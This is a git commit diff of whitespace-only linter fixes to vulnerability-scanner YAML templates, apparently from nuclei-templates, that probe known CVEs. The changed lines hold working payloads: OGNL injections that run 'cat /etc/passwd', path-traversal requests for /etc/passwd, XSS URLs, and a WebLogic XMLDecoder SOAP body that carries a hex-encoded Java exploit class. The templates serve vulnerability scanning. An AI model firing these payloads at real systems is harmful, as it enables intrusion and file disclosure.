Satisfying the linter (all errors and warnings)
* whitespace modifications onlypatch-1
parent
2a320412bf
commit
77103bc629
|
@ -5,8 +5,8 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||||
tags: beanshell,rce,cnvd
|
tags: beanshell,rce,cnvd
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -15,7 +15,7 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
body: |
|
body: |
|
||||||
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -12,10 +12,10 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -15,7 +15,7 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
body: |
|
body: |
|
||||||
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
|
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
|
||||||
tags: cve,cve2013,lfi,javafaces,oracle
|
tags: cve,cve2013,lfi,javafaces,oracle
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
|
||||||
- https://www.exploit-db.com/exploits/38802
|
- https://www.exploit-db.com/exploits/38802
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/38936
|
- https://www.exploit-db.com/exploits/38936
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2014,weblogic,oracle,ssrf
|
tags: cve,cve2014,weblogic,oracle,ssrf
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
||||||
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -9,7 +9,7 @@ info:
|
||||||
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
||||||
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
|
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
|
||||||
description: |
|
description: |
|
||||||
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
||||||
tags: cve,cve2015,jetty
|
tags: cve,cve2015,jetty
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -1,25 +1,25 @@
|
||||||
id: CVE-2015-3337
|
id: CVE-2015-3337
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Elasticsearch Head plugin LFI
|
name: Elasticsearch Head plugin LFI
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
|
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
|
||||||
reference: https://www.exploit-db.com/exploits/37054/
|
reference: https://www.exploit-db.com/exploits/37054/
|
||||||
tags: cve,cve2015,elastic,lfi
|
tags: cve,cve2015,elastic,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
|
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -1,27 +1,27 @@
|
||||||
id: CVE-2015-5688
|
id: CVE-2015-5688
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Geddy before v13.0.8 LFI
|
name: Geddy before v13.0.8 LFI
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
|
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
|
||||||
reference:
|
reference:
|
||||||
- https://nodesecurity.io/advisories/geddy-directory-traversal
|
- https://nodesecurity.io/advisories/geddy-directory-traversal
|
||||||
- https://github.com/geddy/geddy/issues/697
|
- https://github.com/geddy/geddy/issues/697
|
||||||
tags: cve,cve2015,geddy,lfi
|
tags: cve,cve2015,geddy,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
|
description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
|
||||||
reference:
|
reference:
|
||||||
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
|
- https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7823
|
||||||
severity: low
|
severity: low
|
||||||
tags: cve,cve2015,kentico,redirect
|
tags: cve,cve2015,kentico,redirect
|
||||||
|
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
tags: cve,cve2016,network,iot,hp,rce
|
tags: cve,cve2016,network,iot,hp,rce
|
||||||
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
|
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/39858
|
- https://www.exploit-db.com/exploits/39858
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
||||||
|
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
|
|
|
@ -1,24 +1,24 @@
|
||||||
id: CVE-2017-1000028
|
id: CVE-2017-1000028
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GlassFish LFI
|
name: GlassFish LFI
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
|
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
|
||||||
reference: https://www.exploit-db.com/exploits/45196
|
reference: https://www.exploit-db.com/exploits/45196
|
||||||
tags: cve,cve2017,oracle,glassfish,lfi
|
tags: cve,cve2017,oracle,glassfish,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
|
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "/sbin/nologin"
|
- "/sbin/nologin"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
|
@ -6,10 +6,10 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
|
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/mogwailabs/CVE-2017-1000486
|
- https://github.com/mogwailabs/CVE-2017-1000486
|
||||||
- https://github.com/pimps/CVE-2017-1000486
|
- https://github.com/pimps/CVE-2017-1000486
|
||||||
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
|
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
|
||||||
tags: cve,cve2017,primetek,rce
|
tags: cve,cve2017,primetek,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -13,52 +13,52 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /wls-wsat/CoordinatorPortType HTTP/1.1
|
POST /wls-wsat/CoordinatorPortType HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||||
Connection: close
|
Connection: close
|
||||||
Content-Type: text/xml
|
Content-Type: text/xml
|
||||||
Content-Length: 5178
|
Content-Length: 5178
|
||||||
|
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||||
<soapenv:Header>
|
<soapenv:Header>
|
||||||
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||||||
<java>
|
<java>
|
||||||
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
|
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
|
||||||
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
|
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
|
||||||
</void>
|
</void>
|
||||||
<void class="org.mozilla.classfile.DefiningClassLoader">
|
<void class="org.mozilla.classfile.DefiningClassLoader">
|
||||||
<void method="defineClass">
|
<void method="defineClass">
|
||||||
<string>com.supeream.exploits.XmlExp</string>
|
<string>com.supeream.exploits.XmlExp</string>
|
||||||
<object idref="cls"></object>
|
<object idref="cls"></object>
|
||||||
<void method="newInstance">
|
<void method="newInstance">
|
||||||
<void method="say" id="proc">
|
<void method="say" id="proc">
|
||||||
<string>cat /etc/passwd</string>
|
<string>cat /etc/passwd</string>
|
||||||
</void>
|
</void>
|
||||||
</void>
|
</void>
|
||||||
</void>
|
</void>
|
||||||
</void>
|
</void>
|
||||||
<void class="java.lang.Thread" method="currentThread">
|
<void class="java.lang.Thread" method="currentThread">
|
||||||
<void method="getCurrentWork">
|
<void method="getCurrentWork">
|
||||||
<void method="getResponse">
|
<void method="getResponse">
|
||||||
<void method="getServletOutputStream">
|
<void method="getServletOutputStream">
|
||||||
<void method="writeStream">
|
<void method="writeStream">
|
||||||
<object idref="proc"></object>
|
<object idref="proc"></object>
|
||||||
</void>
|
</void>
|
||||||
<void method="flush"/>
|
<void method="flush"/>
|
||||||
</void>
|
</void>
|
||||||
<void method="getWriter"><void method="write"><string></string></void></void>
|
<void method="getWriter"><void method="write"><string></string></void></void>
|
||||||
</void>
|
</void>
|
||||||
</void>
|
</void>
|
||||||
</void>
|
</void>
|
||||||
</java>
|
</java>
|
||||||
</work:WorkContext>
|
</work:WorkContext>
|
||||||
</soapenv:Header>
|
</soapenv:Header>
|
||||||
<soapenv:Body/>
|
<soapenv:Body/>
|
||||||
</soapenv:Envelope>
|
</soapenv:Envelope>
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
|
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
|
||||||
- https://chowdera.com/2020/12/20201229190934023w.html
|
- https://chowdera.com/2020/12/20201229190934023w.html
|
||||||
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
|
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
|
||||||
tags: cve,cve2017,java,rce,deserialization
|
tags: cve,cve2017,java,rce,deserialization
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
|
description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
|
||||||
- https://www.exploit-db.com/exploits/44005
|
- https://www.exploit-db.com/exploits/44005
|
||||||
tags: cve,cve2017,ilo4,hpe
